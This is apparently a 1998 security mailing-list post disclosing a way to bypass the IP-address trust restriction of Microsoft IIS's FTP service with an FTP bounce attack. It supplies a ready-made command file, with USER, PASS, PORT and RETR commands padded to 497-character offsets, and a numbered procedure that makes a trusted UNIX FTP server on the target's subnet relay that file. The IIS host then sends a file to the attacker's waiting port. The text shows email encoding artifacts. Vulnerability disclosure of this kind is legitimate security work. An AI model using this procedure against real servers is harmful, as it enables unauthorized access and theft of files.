Everhart,Glenn From: Nemo [mnemonix@GLOBALNET.CO.UK] Sent: Tuesday, May 12, 1998 1:20 AM To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: By-passing IIS ftp security The Microsoft ftp service, as provided for by Internet Information Server can be configured to allow connections from only certain ("trusted") IP addresses. This paper describes how this security arrangement could be by-passed depending on the configuration of the remote network. This is based on a "bounce" attack but it is important to note that the target ft= p server does not have to have the registry setting "EnablePortAttack" set = to 1; in other words the server doesn=92t have to be configured to allow an = ftp bounce attack. You do, however, need one ftp server that you run the boun= ce attack from. This server has to be included in the range of trusted IP addresses. This will most likely be an unpatched UNIX server on the same subnet as your target IIS server. =A0 Basically you are using this server as a platform to log into the IIS server and steal what files you can. The login process and other commands are contained in a file called cmds.txt and are sent to the IIS server using the ftp bounce attack. When a login occurs this way, because of buffering the ftp service on IIS will read (or at least look for) a comma= nd every 497 characters after the first character of each command. So cmds.t= xt will begin with "user anonymous". 497 characters after the =91u=92 of use= r IIS will read the next command. These characters can be garbage. =A0 USER ANONYMOUS 1234567890abcdefghijklmnopqrstuvwxyz1 1234567890abcdefghijklmnopqrstuvwxyz2 1234567890abcdefghijklmnopqrstuvwxyz3 1234567890abcdefghijklmnopqrstuvwxyz4 1234567890abcdefghijklmnopqrstuvwxyz5 1234567890abcdefghijklmnopqrstuvwxyz6 1234567890abcdefghijklmnopqrstuvwxyz7 1234567890abcdefghijklmnopqrstuvwxyz8 1234567890abcdefghijklmnopqrstuvwxyz9 1234567890abcdefghijklmnopqrstuvwxyz0 1234567890abcdefghijklmnopqrstuvwxyzA 1234567890abcdefghijklmnopqrstuvwxyzB 1234567890abcdefghijklmnopqPASS A@HERE 1234567890abcdefghijklmnopqrstuvwxyz1 1234567890abcdefghijklmnopqrstuvwxyz2 1234567890abcdefghijklmnopqrstuvwxyz3 1234567890abcdefghijklmnopqrstuvwxyz4 1234567890abcdefghijklmnopqrstuvwxyz5 1234567890abcdefghijklmnopqrstuvwxyz6 1234567890abcdefghijklmnopqrstuvwxyz7 1234567890abcdefghijklmnopqrstuvwxyz8 1234567890abcdefghijklmnopqrstuvwxyz9 1234567890abcdefghijklmnopqrstuvwxyz0 1234567890abcdefghijklmnopqrstuvwxyzA 1234567890abcdefghijklmnopqrstuvwxyzB 1234567890abcdefghijklmnopqrstPORT 194,126,80,119,105,34 1234567890abcdefghijklmnopqrstuvwxyz1 1234567890abcdefghijklmnopqrstuvwxyz2 1234567890abcdefghijklmnopqrstuvwxyz3 1234567890abcdefghijklmnopqrstuvwxyz4 1234567890abcdefghijklmnopqrstuvwxyz5 1234567890abcdefghijklmnopqrstuvwxyz6 1234567890abcdefghijklmnopqrstuvwxyz7 1234567890abcdefghijklmnopqrstuvwxyz8 1234567890abcdefghijklmnopqrstuvwxyz9 1234567890abcdefghijklmnopqrstuvwxyz0 1234567890abcdefghijklmnopqrstuvwxyzA 1234567890abcdefghijklmnopqrstuvwxyzB 1234567890abcdvRETR FILE.TXT 1234567890-----=E0 more garbage =A0 I have put the commands in upper case here so they stand out. =A0 So here=92s how the attack would go : Scenario: HostA is a UNIX running an ftp service that has not been patched against bounce attacks. You can log into this server anonymously and have write permissions on at least one directory. HostA=92s IP address is 123.123.123.120 =A0 HostB is an NT server running IIS and allows anonymous connections but on= ly from IP addresses of the same subnet range eg 123.123.123.1 to 123.123.123.254. HostB has the IP address 123.123.123.123. =A0 =A0 1.Connect to Host A, login and change to a directory where you have write permission. 2.Issue the command "quote pasv". The server will respond saying it is going into passive mode. Note the address and the port (ADD,ADD,ADD,ADD,PORT,PORT). Enter this value into your cmds.txt file and save it. Then issue the command "quote stor file.txt". The session will appear to hang. In actual fact it is waiting patiently for someone to connected to its port and send it file.txt. 3.Open another session with Host A. Change to the same directory and uplo= ad cmds.txt.=20 4.Now issue the command "quote port 123,123,123,123,0,21". This primes a connection to the target IIS server.=20 5.Issue the command "quote retr cmds.txt". This causes HostA to make a connection to HostB and after the 3-way TCP handshake the contents of cmds.txt are transferred to HostB. HostB reads the first command USER anonymous. It will reply saying, "Anonymous access allowed, send identity (e-mail name) as password." But not that you=92ll see this. This message = is directed at HostB=92s TCP port 20 (ftpdata). 497 characters after the let= ter =91U=92 of user the IIS server will read the next command "PASS a@here". = It will reply "user anonymous logged in". Our next command (497 characters after the =91P=92 of PASS) is PORT ADD,ADD,ADD,ADD,PORT,PORT. Note =96 Th= is does not go against the IIS ftp service=92s built in security mechanism that disallows a PORT command if a different IP address to the clients is used. This will then set up a connection to the waiting port on Host A that we set up in step 1. Using the command "RETR file.txt" will then cause HostB to send file.txt down to HostA and thus you have by-passed the security setup. Mnemonix http://www.users.globalnet.co.uk/~mnemonix/index.html